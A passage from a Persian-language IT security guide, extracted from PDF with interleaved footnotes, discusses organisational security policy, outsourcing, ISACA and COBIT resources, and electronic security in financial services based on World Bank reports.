‫ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻏﺎﻟﺐ ﺷﺮﻛﺘﻬﺎ ﭼﻴﺰﻱ ﺟﺰ ﺑﺮﻗﺮﺍﺭﻱ ﺗـﻮﺍﺯﻥ‬
‫ﻣﻴﺎﻥ ﺿـﺎﺑﻄﻪﻫـﺎ ﻧﺨﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ‪ ،‬ﻣـﺪﻳﺮﺍﻥ‪ ،‬ﻭ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻫﻤﻴـﺖ ﺩﻫﻨـﺪ ﻭ ﺑـﺎ ﺗﻌﺮﻳـﻒ‬
‫ﺍﻫﺪﺍﻑ ﺭﺳﻤﻲ ﻭ ﺭﺷﺪ ﺣﺪﺍﻗﻞ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴـﺎﻥ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺍﻣﻨﻴﺖ‪ ،‬ﻳﻚ ﻣﻌﻴﺎﺭ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ‪.‬‬
‫ﻭﻗﺘﻲ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺳﻴﺪ‪ ،‬ﻣﺪﻳﺮﻳﺖ ﻧﺒﺎﻳـﺪ‬
‫ﺍﻫﻤﻴﺖ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻣﻤﻴﺰﻳﻬﺎﻱ ﻣـﻨﻈﻢ ﻃـﺮﺡ‬
‫ﻼ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻛﻨﺪ‪ .‬ﺗﻐﻴﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺷﺒﻜﻪ‪ ،‬ﻣﺜ ﹰ‬
‫ﺍﺯ ﻧﻮﻋﻲ ﻛﻪ ﺑﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺘﻦﺑﺎﺯ‪ ١٧‬ﻣﻨﺤـﺼﺮ ﺍﺳـﺖ‪،‬‬
‫ﺑﻪ ﺑﺮﺭﺳﻲ ﻛﺎﻣﻞ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑﻄﻮﺭ ﺧﻼﺻـﻪ‬
‫ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﻳﻚ ﻋﻠﻢ ﺑﺎﺷﺪ ﻳﻚ ﻫﻨﺮ‬
‫ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭﻱ ﻣﻮﻓـﻖ ﺁﻥ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ‬
‫‪Information System Audit and Control‬‬
‫)‪Association (ISACA‬‬
‫‪۱۶‬‬
‫‪15‬‬
‫ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻳﻨﺪﺓ ﺍﻳﻦ ﺍﻧﺠﻤﻦ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ‬
‫ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.isaca.org‬‬
‫ﺍﻳﻦ ﻣﻄﺎﻟﻌﻪ ﺑﺎﻋﺚ ﺷﺪ ﻛﺸﻮﺭ ﺍﺭﻭﮔﻮﺋﻪ ﻳﻚ ﻛﺸﻮﺭ ﻣـﻮﺭﺩ ﻋﻼﻗـﻪ ﺑـﺮﺍﻱ‬
‫ﻣﻄﺎﻟﻌﺔ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﺷﻮﺩ )‪:(۱‬‬
‫‪http://www.isaca.org/ct_case.htm‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺍﺧﻠـﻲ‪ ،‬ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﻧﺪ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫـﺎﻱ‬
‫‪Checklist‬‬
‫‪Procedural Notes‬‬
‫‪13‬‬
‫‪14‬‬
‫‪ (http://www.isaca.org/cobit.htm) COBIT‬ﻳﻚ ﺑﺴﺘﺮ ﺑﺮﺍﻱ‬
‫ﻣﻨﺎﺑﻊ ﻣﻨﺎﺳـﺐ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴـﻚ ﺟﻬـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ‪،‬‬
‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻛﻨﺘﺮﻝ‪ ،‬ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺖ ﺍﺭﺍﺋـﻪ‬
‫ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ ﺑـﺎ ‪ ISACA‬ﺑـﻪ ﺷـﻤﺎ ﺩﻳـﺪ ﺧـﻮﺑﻲ ﺍﺯ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﺁﺗﻲ ﺍﻧﺠﻤﻦ ﻣﻲﺩﻫﺪ‪.‬‬
‫‪Open Source Software Packages‬‬
‫‪17‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪.۱‬‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﺠﺎﺭﻱ ﺑﺎ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷﻨﺪﻩﻫﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﻫﻤﻜﺎﺭ ﺑﻬﺒﻮﺩ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛‬
‫ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺟﻬﺎﻥ‬
‫ﺻﻨﻌﺘﻲ ﺑﻌﻀﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺳﭙﺮﺩﻥ ﺧـﺪﻣﺎﺕ‬
‫ﻏﻴﺮ ﻛﻠﻴﺪﻱ ﻣﺜﻞ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺣﺪﺍﻗﻞ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎ ﻫﻤﭽﻨﺎﻥ ﻳﻚ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﺑﻌـﻀﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻋﻼﻗـﺔ‬
‫ﺧﺎﺻﻲ ﺑﻪ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺟﻬﺎﻧﻲ ﺑﻮﻳﮋﻩ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻧﺠﻤﻦ ﻛﻨﺘـﺮﻝ ﻭ‬
‫ﻣﻤﻴﺰﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺕ )‪ ١٥(ISACA‬ﺩﺭ ‪ ۶۰‬ﻛﺸﻮﺭ ﻫﻤﻜﺎﺭ‬
‫ﺗﺠﺎﺭﻱ ﺩﺍﺭﺩ ﻭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺘﻔـﺎﻭﺕ‬
‫ﺭﺍ ﺑــﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺍﺭﺍﺋــﻪ ﻣــﻲﻛﻨــﺪ‪ ISACA ١٦.‬ﻫﻤﭽﻨــﻴﻦ ﻳــﻚ‬
‫ﭼﺎﺭﭼﻮﺏ ﻛﻨﺘﺮﻝ ﻭ ﺭﺳﻴﺪﮔﻲ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨـﺪ ﻭ‬
‫ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨــﺎﺑﻊ ﺧــﺎﺭﺟﻲ ﻓﻬﺮﺳــﺘﻬﺎﻱ ﻛﻨﺘــﺮﻝ ﺍﺭﺍﺋــﻪ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫‪١٢٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻫﻤﻔﻜﺮﻱ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺘﻔﻜﺮﺍﻥ ﺧـﻼﻕ ﺟﺎﻣﻌـﻪ‬
‫‪١٨‬‬
‫ﻧﻴﺎﺯ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪۱۸‬‬
‫ﺑــﺪﻟﻴﻞ ﺍﻓــﺰﺍﻳﺶ ﺭﺧــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﺳﺮﺍﺳــﺮ ﺟﻬــﺎﻥ‪ ،‬ﺗﻌــﺪﺍﺩﻱ ﺍﺯ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﺟﻬﺎﻧﻲ ﺁﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻣﻨﺒـﻊ ﺯﻳـﺮ ﻣﺮﺍﺟﻌـﻪ‬
‫ﻛﻨﻴﺪ‪:‬‬
‫‪Ernst & Young's 2003 Global Information‬‬
‫‪Security Survey:‬‬
‫‪http://www.ey.com/global/download.nsf/US/TS‬‬
‫‪RSGlobal_Information_Security_Survey_2003‬‬
‫_‪/$file/TSRS‬‬‫‪_Global_Information_Security_Survey_2003.p‬‬
‫‪df‬‬
‫‪١٢٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻲ‬
‫ﺟﺪﻳﺪ ﺩﺭ ﺗﻤﺎﺱ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻨـﺎﻓﻊ ﺑـﺎﻟﻘﻮﺓ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﻬـﺎﻧ ﹺ‬
‫ﺟﻮﺍﻣﻊ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﺍﺯ‬
‫ﺍﻳﻦ ﺑﺎﺯﺍﺭﻫﺎ ﻣﻴﺴﺮ ﻧﻤﻲﺷﻮﺩ ﻣﮕـﺮ ﺑـﺎ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﺤـﻴﻂ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ .‬ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ‪ ،‬ﺭﻭﻧﺪ ﺣﺮﻛﺖ ﺍﻗﺘﺼﺎﺩ ﺟﻬـﺎﻧﻲ ﺑﺤـﺚ‬
‫ﻋﻤﻴﻘﻲ ﺩﺭﺑﺎﺭﺓ ﺗﺠﺎﺭﺕ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻧﻮﻳﻦ ﺭﺍ ﻣﻲﻃﻠﺒﺪ‪ :‬ﭼﮕﻮﻧﻪ‬
‫ﺑﺎﻳﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‪ ٢٢‬ﺭﺍ ﺗﻌﺮﻳـﻒ ﻭ ﺍﺯ ﺁﻥ ﻣﺤﻔﺎﻇـﺖ ﻛـﺮﺩ؟‪،‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺩﻳﺠﻴﺘﺎﻝ ﭼﻪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬـﻮﻣﻲ‬
‫ﺩﺍﺭﻧﺪ؟‪ ،‬ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺳﻄﺢ ﻣﻨﺎﺳـﺒﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺭﺍ ﻣـﺸﺨﺺ‬
‫ﻛﺮﺩ؟‪ ،‬ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﭼﮕﻮﻧـﻪ‬
‫ﺺ ﺑﺎﺯﮔﺸﺖ ﺳﺮﻣﺎﻳﻪ )‪ ٢٣(ROI‬ﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻧﻤﻮﺩ؟‬
‫ﺑﺎﻳﺪ ﺷﺎﺧ ﹺ‬
‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ‬
‫‪١٩‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺩﺭ ﭼﻨﺪ ﻣﻘﺎﻟـﺔ ﺟﺪﻳـﺪ‪ ،‬ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ ﻣـﺴﺌﻠﻪﺍﻱ‬
‫ﺣﻴﺎﺗﻲ ﺩﺭ ﺗﻮﺍﻧﻤﻨﺪ ﺳﺎﺧﺘﻦ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ٢٠‬ﺑـﺮﺍﻱ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﺳـﺎﺯﻣﺎﻥ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺍﺭﺍﺋـﻪ ﻣﻨـﺎﻓﻊ‬
‫ﻓﻨﺎﻭﺭﻱ ﻣﻌﺮﻓﻲ ﺷﺪﻩ ﺑﻮﺩ‪ ٢١.‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﻗﻠـﺐ ﺍﻗﺘـﺼﺎﺩ‬
‫‪۱۹‬‬
‫ﺍﻳــﻦ ﻓــﺼﻞ ﺑــﺎ ﻛﻤــﻚ ﻳــﻚ ﮔــﺰﺍﺭﺵ ﻛــﻪ ﺑﻮﺳــﻴﻠﺔ ‪Thomas‬‬
‫‪ ،Tom Kellerman ،Glaessner‬ﻭ ‪Valerie McNevin‬‬
‫‪۲۱‬‬
‫‪ McNevin‬ﺍﺯ ﺟﻤﻠﻪ ﻛﺘﺎﺏ ﺯﻳﺮ ﺭﺍ ﺑﺒﻴﻨﻴﺪ‪:‬‬
‫‪"Electronic Safety and Soundness: Securing‬‬
‫"‪Finance in a Digital Age, Public Policy Issues‬‬
‫)‪(October 2003‬‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻫﺮ ﺍﺑﺰﺍﺭ‪ ،‬ﻓﻦ‪ ،‬ﻳـﺎ‬
‫ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺯﺵ‬
‫ﻳﻚ ﺷﺒﻜﻪ ﺭﺍ ﺯﻳﺎﺩ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻧـﺮﻡ ﻭ ﺳـﺨﺖ‬
‫ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻧـﺮﻡ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ‪،‬‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎ‪ ،‬ﭘﺮﻭﺗﻜﻠﻬﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻦ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺳﺨﺖ ﻧﻴﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻦ ﺭﺳﺎﻟﻪ ﺍﻭﺝ ﺗﻼﺷﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﻪ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﻭ ﺑـﻪ‬
‫ﺍﺭﺍﺋﻪ ﭼﻨﺪ ﻣﻘﺎﻟﻪ ﻣﻨﺠﺮ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﭼﻨـﺪ ﻣﻘﺎﻟـﺔ ﺩﻳﮕـﺮ ﺍﺯ ﺍﻳـﻦ ﺩﺳـﺘﻪ‬
‫ﻣﻘﺎﻻﺕ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﺑﺮﺍﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺗﻬﻴﻪ ﺷﺪ ﺑﻪ ﻧﮕﺎﺭﺵ ﺩﺭ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪"Electronic Security: Risk Mitigation in‬‬
‫‪Financial Transactions.":‬‬
‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪ectorWeb.nsf/SearchGeneral?openform&E‬‬‫‪Security/E-Finance&Publications‬‬
‫‪E-Finance‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ‪ ،‬ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ‪ Kellerman ،Glaessner‬ﻭ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻴﺴﺖ؟‬
‫‪20‬‬
‫‪“Electronic Security: Risk Mitigation in‬‬
‫‪Financial Transactions” (May 2002, June‬‬
‫‪2002, July 2002),‬‬
‫‪“Electronic Finance: A New Approach to‬‬
‫‪Financial Sector Development?” (2002),‬‬
‫‪“Mobile Risk Management: E-Finance in the‬‬
‫)‪Wireless Environment” (May 2002‬‬
‫ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪http://www.worldbank1.org/finance‬‬
‫‪Privacy‬‬
‫‪Return on Investment‬‬
‫‪22‬‬
‫‪23‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺍﺯ ﻛﺘﺎﺏ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺗﻌﺮﻳﻒ‪ ،‬ﻭ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﻳـﻚ‬
‫ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻫــﺸﺖ ﺭﻛﻨــﻲ ﻭ ﻧﻴــﺰ ﻳــﻚ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻲ ﺟﻬﺖ ﺗﻘﻮﻳﺖ ﻣﺤﻴﻂ ﺍﻣـﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ‬
‫ﺑﺨﺶ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻧﻲ‬
‫ﻛﻪ ﺑﺎ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ‪ -‬ﺑـﻮﻳﮋﻩ ﺩﻭﺍﻳـﺮ ﺍﺟﺮﺍﻳـﻲ‪،‬‬
‫ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻭ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ ‪ -‬ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ‬
‫ﺗﻬﻴﻪ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﻧﻜـﺎﺕ ﻓﻨـﻲ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺭﺍﻫﺒﺮﻱ ﻣﻲﻛﻨﻨـﺪ‪ ،‬ﺑﺎﺯﺭﺳـﻴﻦ‬
‫ﺑﺎﻧﻜﻬﺎ ﻛﻪ ﻛﺎﺭﺁﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻭ‬
‫ﻛﺴﺎﻧﻴﻜﻪ ﺑﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺫﺍﺗﻲ ﻭ ﺭﻭﺯﻣﺮﺓ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﺑﺴﻴﺎﺭ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺑﻪ ﻋﻠﺖ ﻣﺎﻫﻴﺖ ﻫﻤﻮﺍﺭﻩ ﻣﺘﻐﻴ ﹺﺮ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺍﻳﻦ ﻛﺘـﺎﺏ ﻧـﻪﺗﻨﻬـﺎ ﺑـﻪ‬
‫ﺟﺰﺋﻴﺎﺕ ﺗﻤﺎﻡ ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻤﻲﭘﺮﺩﺍﺯﺩ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﭘﺎﺳﺨﻬﺎﻱ ﻛﻠﻲ ﻫﻢ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺩﺭ ﻋـﻮﺽ ﺑـﻪ ﻣـﺮﻭﺭﻱ‬
‫ﺳــﺮﻳﻊ ﺑــﺮ ﺁﻧﭽــﻪ ﺗــﺎ ﺍﻣــﺮﻭﺯ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻣﻨﻴــﺖ ﺍﺗﻔــﺎﻕ ﺍﻓﺘــﺎﺩﻩ‪،‬‬
‫ﺷﻜﺎﻓﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﺣﺎﻝ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ‬
‫ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﺍﺭﺍﺋﻪ ﺑﻌﻀﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﻛﻢ ﻛﺮﺩﻥ ﺍﻳـﻦ‬
‫ﺷﻜﺎﻓﻬﺎ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺑﻌﻀﻲ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻛﻪ ﺩﺭ ﺳﺮﺍﺳﺮ‬
